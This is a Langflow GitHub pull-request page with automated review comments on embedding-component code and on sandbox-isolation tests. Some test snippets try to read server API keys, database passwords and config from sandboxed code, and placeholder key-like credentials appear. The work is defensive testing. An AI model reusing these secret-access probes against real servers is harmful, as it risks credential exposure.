\"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = 
False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n 
build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = field_value or self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n"
🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2018-2019, the ollama_base_url handler ignores the incoming
field_value and always uses self.ollama_base_url, which can cause stale model
lists; change the handler to use a local variable (e.g., ollama_url =
field_value or self.ollama_base_url) and then pass that variable to
is_valid_ollama_url and get_ollama_models so updates use the new value when
provided while still falling back to the instance attribute if field_value is
empty.
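
The fallback described in this prompt can be sketched in isolation. This is only an illustration: `resolve_ollama_url` is a hypothetical helper name, not part of the component, and the real handler would pass the result on to `is_valid_ollama_url` and `get_ollama_models`.

```python
from typing import Optional


def resolve_ollama_url(field_value: Optional[str], instance_url: str) -> str:
    """Prefer the freshly edited value; fall back to the stored attribute."""
    # `or` treats None and "" alike, so an empty field also falls back.
    return field_value or instance_url


# The edited value wins when it is present ...
print(resolve_ollama_url("http://ollama.internal:11434", "http://localhost:11434"))
# ... and the instance attribute is used when the field is empty.
print(resolve_ollama_url("", "http://localhost:11434"))
```

Resolving the URL once and reusing the local variable keeps the validation call and the model fetch pointed at the same address.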

Comment on lines +2038 to +2056
"input_text": {
"_input_type": "BoolInput",
"advanced": true,
"display_name": "Include the original text in the output",
"dynamic": false,
"info": "",
"list": false,
"list_add_label": "Add More",
"name": "input_text",
"placeholder": "",
"required": false,
"show": false,
"title_case": false,
"tool_mode": false,
"trace_as_metadata": true,
"track_in_telemetry": true,
"type": "bool",
"value": true
},

⚠️ Potential issue | 🟡 Minor

Telemetry/privacy check for input_text flag.

The field is tracked in telemetry (track_in_telemetry is true). Ensure only the boolean is captured (no raw text) and that analytics pipelines don’t infer content from it. If uncertain, disable tracking.

🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2038 to 2056, the input_text field is currently configured to be
traced and tracked which risks leaking raw text; change configuration so only
the boolean value is recorded — set trace_as_metadata to false and
track_in_telemetry to false (or remove those flags) and verify no other
properties (placeholders, default value, or surrounding logic) send or derive
the original text to analytics; if you cannot guarantee analytics will only
receive a boolean, disable telemetry entirely for this field.
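
A minimal sketch of the flag change this prompt describes, applied to a field definition loaded as a Python dict. The `field` dict copies only a few keys from the JSON above, and `disable_tracking` is a hypothetical helper, not a Langflow function.

```python
import copy


def disable_tracking(field: dict) -> dict:
    """Return a copy of a field definition with tracing and telemetry turned off."""
    updated = copy.deepcopy(field)  # leave the original definition untouched
    updated["trace_as_metadata"] = False
    updated["track_in_telemetry"] = False
    return updated


field = {
    "name": "input_text",
    "type": "bool",
    "value": True,
    "trace_as_metadata": True,
    "track_in_telemetry": True,
}
safe_field = disable_tracking(field)
print(safe_field["trace_as_metadata"], safe_field["track_in_telemetry"])
```

Whether both flags need to be off depends on what the telemetry pipeline actually records for a boolean field; the sketch only shows the conservative choice.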

Comment thread src/backend/tests/unit/api/v1/test_validate.py Outdated
Comment thread src/lfx/src/lfx/custom/sandbox.py Outdated
Comment thread src/lfx/src/lfx/custom/sandbox.py Outdated
Comment thread src/lfx/tests/unit/custom/test_sandbox_isolation.py Outdated
Comment on lines +29 to +31
server_api_key = "sk-secret-key-12345"
server_db_password = "db_password_secret"
server_config = {"api_key": server_api_key, "database_url": "postgresql://user:password@localhost/db"}

⚠️ Potential issue | 🟠 Major

Fake API keys will trigger gitleaks and other secret scanners

The hard‑coded strings like:

  • server_api_key = "sk-secret-key-12345" (Line 29)
  • self.api_key = "sk-secret-12345" (Line 63)

match generic API‑key patterns and are already being flagged by gitleaks. Even though these are clearly test values, they will cause CI noise or failures.

Consider changing them to values that don’t resemble real keys (and avoid common prefixes like sk-), e.g.:

-    server_api_key = "sk-secret-key-12345"
+    server_api_key = "FAKE_SERVER_API_KEY_FOR_TESTS"
@@
-            self.api_key = "sk-secret-12345"
+            self.api_key = "FAKE_SERVER_CONFIG_API_KEY_FOR_TESTS"

or add explicit allowlist annotations consistent with your secret‑scanning configuration.

Also applies to: 63-66

🧰 Tools
🪛 Gitleaks (8.29.0)

[high] 29-29: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

🤖 Prompt for AI Agents
In src/lfx/tests/unit/custom/test_sandbox_security.py around lines 29-31 and
63-66, replace hard-coded strings that resemble real API keys (e.g. values with
sk- or sk-secret prefixes) with clearly non-secret test identifiers or reference
test fixtures/env vars, or add an explicit secret-scan allowlist annotation per
our CI configuration; ensure new values do not match common API-key patterns
(avoid prefixes like "sk-", long hex/base64 blobs, or "secret") and prefer
simple labels such as "test-api-key-1" or read the value from a test-only
config/env var, updating tests accordingly.
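
One way to follow this suggestion, sketched under assumptions: the environment variable name `LFX_TEST_API_KEY` is hypothetical, and the regular expression is only a rough stand-in for what a scanner might flag (real gitleaks rules differ).

```python
import os
import re

# Hypothetical variable name, used only for this illustration.
TEST_KEY_ENV_VAR = "LFX_TEST_API_KEY"

# Rough approximation of key-like patterns; not the actual gitleaks rule set.
SUSPICIOUS = re.compile(r"^sk-|secret", re.IGNORECASE)


def get_test_api_key() -> str:
    """Return a placeholder key for tests, overridable through the environment."""
    return os.environ.get(TEST_KEY_ENV_VAR, "test-api-key-1")


def looks_like_secret(value: str) -> bool:
    """Report whether a value resembles the patterns called out in the review."""
    return bool(SUSPICIOUS.search(value))


print(looks_like_secret("sk-secret-key-12345"))
print(looks_like_secret(get_test_api_key()))
```

A check like `looks_like_secret` could also run as a test of its own, so a key-shaped fixture is caught before the scanner sees it.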

Comment on lines +33 to +50
    code = """
def test():
    # Try to access server's Python variables containing secrets
    # If isolation is broken, these would be accessible
    return server_api_key, server_db_password, server_config
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    execute_in_sandbox(code_obj, exec_globals)

    # Call the function
    test_func = exec_globals["test"]

    # CRITICAL: Should raise NameError - server secrets are not accessible
    # This is what prevents credential theft
    with pytest.raises(NameError):
        test_func()

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

exec_globals["test"] never populated by execute_in_sandbox

All tests in this file follow the pattern:

  1. exec_globals = {}
  2. execute_in_sandbox(code_obj, exec_globals)
  3. test_func = exec_globals["test"]
  4. with pytest.raises(NameError): test_func()

However, the current execute_in_sandbox implementation constructs its own sandbox_globals dict, merges exec_globals into it, and then executes exec(code_obj, sandbox_globals, sandbox_locals) without writing anything back to exec_globals. That means exec_globals remains empty and exec_globals["test"] will raise KeyError before your pytest.raises(NameError) assertions ever run. The same issue affects every test using this pattern (lines 33‑50, 69‑86, 98‑129, 140‑160, 172‑188, 195‑214, 226‑249, 261‑275).
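
The mismatch can be reproduced with plain `exec`. The function below is a hypothetical stand-in that mirrors only the behavior described in this comment (merge into a private dict, execute, write nothing back); it is not the actual `execute_in_sandbox` and does no builtin or import blocking.

```python
def run_without_export(code_obj, exec_globals):
    """Hypothetical stand-in: execute in private dicts and never write back."""
    sandbox_globals = dict(exec_globals)  # merged copy; the caller's dict is not reused
    sandbox_locals = {}
    exec(code_obj, sandbox_globals, sandbox_locals)
    return sandbox_locals


code_obj = compile("def test():\n    return 1\n", "<test>", "exec")
exec_globals = {}
definitions = run_without_export(code_obj, exec_globals)

print("test" in exec_globals)  # the caller's dict was never written to
print("test" in definitions)   # the function lives in the private namespace
```

With the caller's dict left empty, `exec_globals["test"]` fails on the lookup itself, before any sandboxed code is called.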

Two options:

  • Adjust tests to assert on the exception raised by execute_in_sandbox itself (and call test() from within the code string), e.g.:
-    code = """
-def test():
-    # Try to access server's Python variables containing secrets
-    # If isolation is broken, these would be accessible
-    return server_api_key, server_db_password, server_config
-"""
+    code = """
+def test():
+    # Try to access server's Python variables containing secrets
+    # If isolation is broken, these would be accessible
+    return server_api_key, server_db_password, server_config
+
+# Call inside the sandbox so NameError is raised during execute_in_sandbox
+test()
+"""
@@
-    code_obj = compile(code, "<test>", "exec")
-    exec_globals = {}
-
-    execute_in_sandbox(code_obj, exec_globals)
-
-    # Call the function
-    test_func = exec_globals["test"]
-
-    # CRITICAL: Should raise NameError - server secrets are not accessible
-    # This is what prevents credential theft
-    with pytest.raises(NameError):
-        test_func()
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    # CRITICAL: Should raise NameError - server secrets are not accessible
+    # This is what prevents credential theft
+    with pytest.raises(NameError):
+        execute_in_sandbox(code_obj, exec_globals)
  • Or, if the intended contract is that sandboxed definitions are exported back into exec_globals, update execute_in_sandbox to propagate selected names (e.g., functions) out of the internal sandbox_globals into exec_globals.

Right now, the tests and the sandbox API are not aligned, and the assertions won’t be exercising the intended NameError behavior.


🏁 Script executed:

#!/bin/bash
# Find execute_in_sandbox function definition
rg -n "def execute_in_sandbox" --type py

Length of output: 114


🏁 Script executed:

#!/bin/bash
# Find where execute_in_sandbox is imported/used in test file
rg -n "execute_in_sandbox" src/lfx/tests/unit/custom/test_sandbox_security.py -B2 -A2

Length of output: 1022


🏁 Script executed:

#!/bin/bash
# Get the full test file to understand structure
cat src/lfx/tests/unit/custom/test_sandbox_security.py

Length of output: 9640


🏁 Script executed:

#!/bin/bash
# Find all Python files that might contain execute_in_sandbox definition
fd -e py -x rg -l "def execute_in_sandbox" {} \;

Length of output: 35


🏁 Script executed:

#!/bin/bash
# Search more broadly for execute_in_sandbox in the codebase
rg -n "execute_in_sandbox" --type py -C3

Length of output: 12538


🏁 Script executed:

#!/bin/bash
# Get the execute_in_sandbox function implementation
sed -n '179,250p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 2584


🏁 Script executed:

#!/bin/bash
# Get full sandbox.py file for complete context
cat src/lfx/src/lfx/custom/sandbox.py

Length of output: 8824


Tests fail with KeyError before asserting intended NameError behavior

The review comment is correct. In execute_in_sandbox, definitions created by exec(code_obj, sandbox_globals, sandbox_locals) are placed into sandbox_globals, not the passed-in exec_globals parameter. Since exec_globals is never updated after execution, the test pattern fails at exec_globals["test"] with KeyError before the NameError assertions can run.

This affects all tests in the file: lines 33–50, 69–86, 98–129, 140–160, 172–188, 195–214, 226–249, 261–275.

Choose one solution:

  1. Move the function call into the code string so NameError is raised during execute_in_sandbox:
code = """
def test():
    return server_api_key, server_db_password, server_config
test()
"""
code_obj = compile(code, "<test>", "exec")
exec_globals = {}
with pytest.raises(NameError):
    execute_in_sandbox(code_obj, exec_globals)
  2. Update execute_in_sandbox to propagate selected definitions (e.g., functions) back into exec_globals after execution.
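
The option of propagating definitions back could look roughly like the sketch below. `execute_and_export` is a hypothetical name, the rule for what to export (public callables only) is an assumption, and the sketch leaves out the builtin and import restrictions that the real sandbox applies.

```python
def execute_and_export(code_obj, exec_globals):
    """Hypothetical variant: run in a private namespace, then export callables."""
    sandbox_globals = dict(exec_globals)
    sandbox_locals = {}
    exec(code_obj, sandbox_globals, sandbox_locals)
    # Copy back only public callables so the caller can look them up by name.
    for name, value in sandbox_locals.items():
        if callable(value) and not name.startswith("_"):
            exec_globals[name] = value


code = "def test():\n    return server_api_key\n"
exec_globals = {}
execute_and_export(compile(code, "<test>", "exec"), exec_globals)

# The exported function still resolves names against the private globals,
# so a name that only exists on the server side is not visible to it.
try:
    exec_globals["test"]()
    outcome = "returned"
except NameError:
    outcome = "NameError"
print(outcome)
```

With this contract the existing test pattern (look up `test`, then assert on the call) would reach its `pytest.raises(NameError)` block instead of failing on the dictionary lookup.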

@github-actions
github-actions Bot commented Dec 19, 2025

Frontend Unit Test Coverage Report

Coverage Summary

| Lines | Statements | Branches | Functions |
| --- | --- | --- | --- |
| Coverage: 17% | 16.65% (4707/28254) | 9.97% (2177/21831) | 10.94% (679/6201) |

Unit Test Results

| Tests | Skipped | Failures | Errors | Time |
| --- | --- | --- | --- | --- |
| 1830 | 0 💤 | 0 ❌ | 0 🔥 | 25.311s ⏱️ |

Comment thread src/lfx/src/lfx/custom/sandbox.py Outdated

Should we make some of this lazy?

Comment thread src/lfx/src/lfx/custom/sandbox.py Outdated
Comment thread src/lfx/src/lfx/custom/sandbox.py Outdated
@jordanrfrazier jordanrfrazier changed the title from "ref: add sandbox to exec call in validate endpoint" to "ref: use isolated builtins to exec call in validate endpoint" Jan 5, 2026
@jordanrfrazier
Collaborator Author

Converting to draft for now. We need a way to identify core components before this can be merged; otherwise, core components that use "dangerous" builtins will fail 1) Updates and 2) Check and Save (during validation).

Once we have a method to identify core components, we can also go ahead and add this isolation layer to execution.

@github-actions github-actions Bot added enhancement New feature or request and removed enhancement New feature or request labels Jan 6, 2026
@github-actions github-actions Bot added enhancement New feature or request and removed enhancement New feature or request labels Jan 7, 2026

Labels

DO NOT MERGE Don't Merge this PR enhancement New feature or request

2 participants